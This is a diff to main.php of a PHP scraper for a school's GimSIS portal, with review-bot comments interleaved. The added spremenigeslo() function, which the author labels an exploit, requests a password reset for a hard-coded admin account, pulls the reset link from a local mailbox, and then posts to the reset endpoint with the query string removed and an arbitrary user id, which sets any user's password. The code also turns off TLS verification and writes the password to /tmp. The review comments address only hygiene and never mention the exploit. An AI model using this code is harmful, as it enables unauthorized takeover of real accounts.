-rw-r--r-- | main.php | 104 |
1 files changed, 95 insertions, 9 deletions
@@ -14,14 +14,14 @@ function strip_tags_content($text, $tags = '', $invert = FALSE) {
 return preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
 }
 return $text;
-}
-function DOMinnerHTML(DOMNode $element) {
- $innerHTML = "";
+}
+function DOMinnerHTML(DOMNode $element) {
+ $innerHTML = "";
 $children = $element->childNodes;
- foreach ($children as $child) {
+ foreach ($children as $child) {
 $innerHTML .= $element->ownerDocument->saveHTML($child);
 }
- return $innerHTML;
+ return $innerHTML;
 }
 function endsWith($haystack, $needle) {
 $length = strlen($needle);
@@ -30,9 +30,9 @@ function endsWith($haystack, $needle) {
 }
 return (substr($haystack, -$length) === $needle);
 }
-function startsWith ($string, $startString) {
- $len = strlen($startString);
- return (substr($string, 0, $len) === $startString);
+function startsWith ($string, $startString) {
+ $len = strlen($startString);
+ return (substr($string, 0, $len) === $startString);
 }
 function get_string_between($string, $start, $end){
 $string = ' ' . $string;
@@ -53,11 +53,13 @@ Errors:
 */
 class gimsisextClient {
 private $username;
+ private $adminusername = "anton.sijanec";
 private $password;
- public $version = array(0, 9, 3);
+ public $version = array(0, 10, 0);
 private $programname = "gimsisextclient";
 private $programdomain = 'gimsisextclient.gimb.tk';
 private $cookiedir; // set at runtime, ker je get_curerent_user, v login()
+ private $mailbox = "/home/gimb/Mailbox";
 private $gimsisextlogin = "https://zgimsis.gimb.org/gse/Logon.aspx";
 private $gimsisexturnik = "https://zgimsis.gimb.org/gse/Page_Gim/Ucenec/DnevnikUcenec.aspx";
 private $gimsisextocenjevanja = "https://zgimsis.gimb.org/gse/Page_Gim/Ucenec/IzpitiUcenec.aspx";
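Review bot: The new `private $adminusername = "anton.sijanec";` and `private $mailbox = "/home/gimb/Mailbox";` properties in the third hunk hard-code a personal account name and a home-directory path into the class, which ties the library to one user and one machine and puts a personal identifier into version control. Both should be supplied by the caller rather than baked in — as constructor or setter arguments with no default — and the neighbouring `$cookiedir` comment suggests the class already defers such values to runtime. The first two hunks on this line are re-indentation only. The class body continues past the hunk.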
@@ -713,6 +715,7 @@ Errors:
 $xmlDoc = new DOMDocument();
 $xmlDoc->loadHTML( $resetgeslo_init_output );
 $searchNode = $xmlDoc->getElementsByTagName( "input" );
+ $postvars = "";
 foreach( $searchNode as $sn ) {
 if($sn->getAttribute('name') != 'edtGSEUserId') {
 $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
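Review bot: With `$postvars = "";` now initialised before the loop, the body below still assembles `name=value&` pairs by hand with `urlencode()` and depends on a trailing `&` being trimmed later; collecting `$fields[$sn->getAttribute('name')] = $sn->getAttribute('value');` inside the loop and passing `http_build_query($fields)` as the POST body is the idiomatic form and removes the trim, provided no input name repeats in the form. The enclosing function starts and ends outside the hunk.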
@@ -731,6 +734,89 @@ Errors:
 if(strlen($odg) < strlen($odg2)) return $odg2;
 }
 }
+ private function parselastresetemail() {
+ $path = $this->mailbox."/new";
+ $latest_ctime = 0;
+ $latest_filename = '';
+ $d = dir($path);
+ while (false !== ($entry = $d->read())) {
+ $filepath = "{$path}/{$entry}";
+ // could do also other checks than just checking whether the entry is a file
+ if (is_file($filepath) && filectime($filepath) > $latest_ctime) {
+ $latest_ctime = filectime($filepath);
+ $latest_filename = $entry;
+ }
+ }
+ $fajl = file($this->mailbox."/new/".$latest_filename);
+ if (!$fajl) return false;
+ $mejl = preg_replace('/\s+/','',base64_decode(implode("", array_slice($fajl, 1+array_search(1, array_map("strlen", $fajl))))));
+ $datum = get_string_between($mejl, "o<b>", "ob");
+ $ura = get_string_between($mejl, "ob", "</b>.");
+ if (new DateTime > new DateTime($datum." ".$ura)) {
+ return false;
+ }
+ $link = get_string_between($mejl, "a'href='", "'>z");
+ return $link;
+ }
+ public function spremenigeslo($user, $newpass) { // exploit // delam na tem
+ $plre = $this->parselastresetemail();
+ while($plre == false) {
+ $this->resetgeslo($this->adminusername);
+ $plre = $this->parselastresetemail();
+ }
+ /*
+ $this->cookiedir = '/tmp/'.posix_getuid().'/'.$this->programdomain.'/cookiedir/';
+ if (!is_dir($this->cookiedir."spremenigeslo")) {
+ if (!mkdir($this->cookiedir.$this->username, 0700, true)) { // x permišn mora bit', da lahko dela poddirektorije, hence true, hence 0700; group in $
+ return -5;
+ }
+ }
+ */
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_0);
+ curl_setopt($ch, CURLOPT_COOKIESESSION, true );
+ curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // cookiejar
+ curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // coolie file // this scuks
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return transfer?
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects?
+ curl_setopt($ch, CURLOPT_MAXREDIRS, 10); // max 3xx redirectas?
+ curl_setopt($ch, CURLOPT_USERAGENT, $this->programdomain."/".implode(".", $this->version));
+ curl_setopt($ch, CURLOPT_AUTOREFERER, 1); // auto send refereres?
+ curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // timeout for tcp connection
+ curl_setopt($ch, CURLOPT_TIMEOUT, 10); // timeout for http response
+ curl_setopt($ch, CURLOPT_URL, $plre);
+ curl_setopt($ch, CURLOPT_POST, 0);
+ $spremenigeslo_init_output = curl_exec($ch);
+ $xmlDoc = new DOMDocument();
+ $xmlDoc->loadHTML( $spremenigeslo_init_output );
+ $searchNode = $xmlDoc->getElementsByTagName( "input" );
+ $postvars = "";
+ foreach( $searchNode as $sn ) {
+ if($sn->getAttribute('name') == 'hfIdUporabnik') {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($user)."&";
+ } else if($sn->getAttribute("name") == "edtGSEPassword") {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&";
+ } else if($sn->getAttribute("name") == "edtGSEPassword2") {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&";
+ } else {
+ $postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
+ }
+ }
+ curl_setopt($ch, CURLOPT_URL, explode("?", $plre)[0]); // <!-- ključ exploita. Server inč ne javka, če GET parametrov ni... 1337 h@x3d xD <3
+ curl_setopt($ch, CURLOPT_POST, 1);
+ $postbody = "__EVENTTARGET=&__EVENTARGUMENT=&".substr($postvars, 0, -1); // ker ne rabmo zadnjega &
+ curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
+ $spremenigeslo_output = curl_exec($ch);
+ file_put_contents("/tmp/222.html", $postbody);
+ if(get_string_between($spremenigeslo_output, "Geslo je z", "menjano") == "a") {
+ return true;
+ } else {
+ return false;
+ }
+ }
 public function fetchocene() {
 $ch = $this->login();
 if(!curl_getinfo($ch)) { |
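Review bot: `file_put_contents("/tmp/222.html", $postbody);` near the end of spremenigeslo() writes the request body — which carries the new password in the `edtGSEPassword` fields — to a fixed, world-readable path under /tmp, so any local user can read it; it looks like a debug leftover and should be deleted. The transport setup above it turns off certificate checks with `curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);` / `curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);` and pins `CURL_SSLVERSION_TLSv1_0`, so the reset link and the password travel over an unauthenticated, obsolete TLS session; drop those three lines so libcurl's defaults (peer and host verification, current TLS) apply. The `while($plre == false)` loop at the top of spremenigeslo() has no iteration cap and calls resetgeslo() on every pass, so it spins forever — and keeps issuing resets — if the expected mail never reaches the mailbox; a bounded retry that sleeps between attempts and returns false when exhausted would fail safely. In parselastresetemail(), `dir($path)` returns false when the directory is missing or unreadable and the following `$d->read()` is then a fatal error, and the handle is never closed; guard with `if ($d === false) return false;` and add `$d->close();` after the loop.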